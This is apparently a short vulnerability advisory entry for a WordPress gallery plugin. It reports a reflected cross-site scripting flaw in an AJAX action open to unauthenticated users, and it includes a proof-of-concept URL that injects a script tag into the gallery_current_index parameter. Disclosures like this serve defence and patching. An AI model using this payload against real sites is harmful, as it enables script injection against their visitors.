The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting issue
https://example.com/wp-admin/admin-ajax.php?action=wpda_gall_load_image_info&start=0&limit=1&gallery_current_index=<script>alert(`xss`)</script>
cydave
cydave
Yes
2022-06-13 (about 1 years ago)
2022-06-13 (about 1 years ago)
2023-03-13 (about 6 months ago)